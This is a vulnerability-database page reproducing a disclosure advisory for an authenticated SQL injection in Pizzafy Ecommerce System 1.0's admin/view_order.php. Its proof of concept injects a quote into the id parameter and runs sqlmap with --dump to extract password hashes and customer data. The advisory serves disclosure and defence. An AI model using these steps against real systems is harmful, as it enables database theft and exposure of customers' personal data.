Vulners
Lucene search
đ Pizzafy Ecommerce System 1.0 SQL Injection
đïžÂ 29 Apr 2026 00:00:00Reported by Imad AlviType 
 packetstormđ packetstorm.newsđ 44 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2026-7394 | 29 Apr 202617:15 | â | attackerkb |
 | SourceCodester Pizzafy Ecommerce System æłšć „æŒæŽ | 29 Apr 202600:00 | â | cnnvd |
 | CVE-2026-7394 | 29 Apr 202617:15 | â | cve |
 | CVE-2026-7394 SourceCodester Pizzafy Ecommerce System GET Parameter view_order.php sql injection | 29 Apr 202617:15 | â | cvelist |
 | EUVD-2026-26266 | 29 Apr 202617:15 | â | euvd |
 | CVE-2026-7394 | 29 Apr 202618:16 | â | nvd |
 | PT-2026-35963 | 29 Apr 202600:00 | â | ptsecurity |
 | CVE-2026-7394 SourceCodester Pizzafy Ecommerce System GET Parameter view_order.php sql injection | 29 Apr 202617:15 | â | vulnrichment |
# SQL Injection in Pizzafy Ecommerce System â `admin/view_order.php`
## Details
| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Version** | 1.0 |
| **Vulnerability** | SQL Injection |
| **CWE** | CWE-89 |
| **CVSSv3 Score** | 7.2 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **Researcher** | Xmyronn |
| **Date** | 2026-04-11 |
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
---
## Affected Component
**File:** `Pizzafy/admin/view_order.php`
**Parameter:** `id` (GET)
---
## Description
The `admin/view_order.php` endpoint in Pizzafy Ecommerce System 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading to full database compromise.
---
## Proof of Concept
### Step 1 â Login as Administrator
Navigate to:
```
http://localhost/pizzafy/Pizzafy/admin/index.php
```
Login with admin credentials.
### Step 2 â Navigate to Orders
```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
```
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212106" src="https://github.com/user-attachments/assets/b415920d-d2c9-42f6-9ecb-0e3579b7e399" />
Click **View Order** on any order entry.
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212116" src="https://github.com/user-attachments/assets/9d8db0fb-a08f-445d-9592-818636531009" />
### Step 3 â Intercept Request in Burp Suite
The intercepted GET request looks like:
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212135" src="https://github.com/user-attachments/assets/3149154e-853f-4a88-81dc-be00a209df2f" />
### Step 4 â Trigger SQL Error
Modify `id=1` to `id='`:
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212145" src="https://github.com/user-attachments/assets/506ae221-64b0-42e9-a959-ecadfa5029e9" />
```
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
```
**Response â MySQL error exposed:**
```
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
```
### Step 5 â Exploit with sqlmap
Save the request to `view_order.txt` and run:
```bash
sqlmap -r view_order.txt --dump --batch
```
<img width="1920" height="1080" alt="Screenshot 2026-04-11 212406" src="https://github.com/user-attachments/assets/438e9b26-4927-462d-b3db-234d77626a84" />
**sqlmap confirmed injection types:**
| Type | Title |
|---|---|
| Boolean-based blind | AND boolean-based blind â WHERE clause |
| Error-based | MySQL >= 5.0 FLOOR error-based |
| Time-based blind | MySQL >= 5.0.12 SLEEP |
| UNION query | Generic UNION query â 11 columns |
**Full database dumped:**
```
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
```
Sensitive data exposed includes bcrypt password hashes, customer emails, order details, and system configuration.
---
## Impact
A malicious authenticated administrator (or attacker who has obtained admin credentials) can:
- Dump the full database including password hashes
- Read sensitive customer PII (names, emails, addresses, phone numbers)
- Potentially write to the database
---
## References
- [SourceCodester â Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Apr 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.14.7
CVSS 45.1
CVSS 25.8
CVSS 34.7
EPSS0.00039
SSVC